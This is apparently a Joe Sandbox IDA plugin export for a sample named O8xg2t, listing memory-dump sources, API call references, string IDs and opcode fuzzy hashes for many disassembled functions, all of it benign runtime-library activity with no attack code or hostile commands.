                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                  • String ID:
                                  • API String ID: 3326452711-0
                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                  • API String ID: 2984211723-1229430080
                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction ID: 7a259519bc08c6f0ac289ccbe8cc23391b6b7254e680c1ba314532043cd12642
                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction Fuzzy Hash: 77F04FA5A1970691EF10AF34E444B3B7731AF88B61FD80335DAAD5A6E4CF2CD849C340
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressExitHandleModuleProcProcess
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 75539706-1276376045
                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction ID: 2a28e95cb6a7a6a9ee381350e7d0791bf42304456d6e64d1f1a1e726382e0cae
                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction Fuzzy Hash: F9B1B2B1A0A64285EE65FF71D480A3A67A0EF54B84F9DC435DE4C2F785DE3CE8498B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileInfoSleepStartupType
                                  • String ID:
                                  • API String ID: 1527402494-0
                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3078728599-0
                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 1850339568-0
                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction ID: 46cc5dcd53557b42516c928f39491b11e945224738e3ce02a790eab27aa36c01
                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction Fuzzy Hash: B611B4B2D9864B21FE643D38D325B7B12005F9C370F9C4230E56E2E2DA9E2C5C484700
                                  APIs
                                  • FlsGetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096A3
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096C2
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096EA
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096FB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC320970C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction ID: 863471b9393fcf372de28e4fe3f5ea54804387744f2d3cc0a7b66040f7d46c27
                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction Fuzzy Hash: 061108F1A0C24245FE58BE35E55197B63519F447F0FDC4234E82E6E6E6EE2CE4459B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction ID: f09811be4aabe796a3d0d19616357d09b1b139ca1cb93bfe0b2132573550671a
                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction Fuzzy Hash: 2C11B6F0A092464AFE68BE72D45297B67518F44770E9C0634D93F2D2E2DD2CB4499B10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction ID: bc13a64d3d9333e1b4f10ba763cecc5c8f9defc2cfca4ca532505b58e41e59a4
                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction Fuzzy Hash: 289193B3A087858AEB10EF74D4806AE7BA0FB44788F58413AEB4D2B755DF38D199C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction ID: 928aa74c63e6ba45b63879787781fe666bb26cd3bea429ba50938ed951316d26
                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction Fuzzy Hash: A551C172B096428ADF14EF39D484E3A7391EB44B88F888130EB4A5B788DF7CE845C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction ID: dc75bc0ad159981e4af71e124b3389786561e70c56483767095489e48a05d63f
                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction Fuzzy Hash: 04517FB290C3828AEF64AF21D484B6A77A0EB54B84FAC4135DA4D6BB85CF3CF454C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction ID: 48d53e1834c5f5568877b8f373fd703032ebd8ef0c8d49752ac5a3fb3da99da6
                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction Fuzzy Hash: F861927290CBC585DB60AF25E4407AAB7A0FB84B84F584225EB9C1BB55DF7CD194CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressHandleLoadModuleProc
                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                  • API String ID: 3055805555-3733552308
                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Process$CurrentSizeWorking
                                  • String ID: Shrinking process size
                                  • API String ID: 2122760700-652428428
                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Leave
                                  • String ID:
                                  • API String ID: 2801635615-0
                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction ID: 722782294bf27c7b0e1d60491b4610e1c2fb1880d4af5d019b3b60bd6a29d323
                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction Fuzzy Hash: CDD108B2F08A8189EB11DF75D4806ED37B1FB44798B884236DE5D6BB99DE38D44AC340
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EE38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EEC3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleErrorLastMode
                                  • String ID:
                                  • API String ID: 953036326-0
                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction ID: bc0060bbca3f17f6f7ed8b7e9410476f719397b99e53a02845e36e2fa3eb9091
                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction Fuzzy Hash: A091C7B2F18A5185FF60AF75D440A7E6BA4AB04798F984135DE4E7A685DF38D48AC300
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                  APIs
                                  Memory Dump Source
